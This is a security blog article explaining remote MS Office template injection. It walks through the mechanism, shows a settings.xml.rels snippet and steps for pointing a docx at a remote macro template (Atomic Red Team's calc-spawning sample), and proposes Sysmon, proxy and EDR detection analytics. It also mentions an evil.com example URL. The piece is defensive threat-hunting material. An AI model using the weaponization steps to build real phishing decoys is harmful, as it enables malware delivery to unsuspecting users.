Remote MS Office template injection

Tho Le
4 min readJul 16, 2023

--

This article delves into the remote MS Office template injection attack, offering a comprehensive exploration of its inner workings. By simulating the attack scenario, we gain valuable insights into its execution and potential implications. Furthermore, we explore effective detection and threat-hunting opportunities against this attack.

The article contains 3 main parts as below:

  • How the attack works
  • Attack simulation
  • Detection and threat-hunting opportunities

How the attack works

When opening an MS document file (e.g. docx, pptx, and xlsx), usually a default MS template will be loaded by MS Office (e.g. C:\Program Files\Microsoft Office\Office16\Normal.dotm). However, a template can be easily defined/modified by updating a setting. This opens an opportunity for adversaries to weaponize a “look benign” document for their phishing campaign by sending a “harmless” MS document file referring to a remote malicious template, which is only fetched and loaded upon opening the decoy file. This will effectively evade existing email security measures.

Below is an example of that setting for a docx file (the simulation part will uncover in further detail ). In short, this setting tells winword.exe to access the “target”, fetch the template file (opencalc.dotm) and load the template.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships
xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
Target="https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/src/opencalc.dotm?raw=true"
TargetMode="External"/>
</Relationships>

Attack simulation

The figure below illustrates the attack scenario. From a phishing campaign, attackers send an email with a “harmless’ word file attached to bypass existing email security measures. A user is lured to open that Word file, winword.exe fetches and loads the malicious template with Marco (VBA). In this example, the macro will simply spawn calc.exe.

In this article, we use the existing test by atomic read team. However, GitHub changes the URL to access “opencalc.dotm”, to make the test work, we need to update the URL with the following steps (actually, you can create a new sample by following the step as well):

  • Step 1: Unzip the benign.docx file (the new MS document file format is essentially just a compressed file)
  • Step 2: open \word\_rels\settings.xml.rels in a text and editor to update “target” with the update URL as below:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships
xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
Target="https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/src/opencalc.dotm?raw=true"
TargetMode="External"/>
</Relationships>
  • Step 3: Zip the whole content back to benign.docx

Upon execution, you will see the following screenshots:

As benign.docx is sent from Internet (mark of the we)b, it will be open in “Protected Viewed”. Upon enable, “opencalc.dotm” will be fetched and loaded.
Marco is disabled by default. Upon enable, VBA will be executed

Detection, and threat-hunting opportunities

Hypothesis: adversaries lure users to open a “harmless” document that links to a malicious template hosted in a remote server.

below are some analytics to detect/hunt remote template injection:

  • Analytic 1: Detect MS Office template files written to the user’s folder

In the test, the downloaded template will be deleted after closing winword.exe.

Data source: Sysmon (id 11) , EDR logs (or equivalent) are required for detection.

  • Analytic 2: Detect MS Office accessing suspicious URL(s)

Depending on your IT infrastructure/hygiene, MS Office accessing an unknown URL should be a red flag, especially to download a template file. However, please note that advanced attackers can easily hide file name in URL (e.g. https://evil.com/index.php?d=<randome>).
In a well-designed environment, accessing untrusted Internet sites from MS Office should be prohibited.

data sources: proxy logs (preferably full TLS termination) (or equivalent) are required.

  • Analytic 3: Marco/VBA execution from mark-of-the-web (MOTW) documents

As can be seen from the screenshot above, winword.exe set “TrustRecords” for “benign.docx” twice, one when “Enable editing” and one when “Enable Content” (enable Marco). Hence, “TrustRecords” is set two times for a document indicating a MOTW document is opened with VBA execution, which should be a red flag.

Data sources: Sysmon (id 12, 13) or EDR (or equivalent) for registry key events are required.

  • Analytic 4: MS Office spawns suspicious child processes

In this example, VBA simply spawns calc.exe for the testing purpose. However, in real situations, attackers may launch powershell, rundll32 etc. Hence, the best approach is to survey your environment for the baseline of child processes from MS Office and any unexpected child processes worth an investigation.

Data source: Winevent 4688, Sysmon event 1 or EDR (or equivalent) for process creation are required.

--

--

Tho Le

Senior Cyber Security Analyst — be better than the yesterday self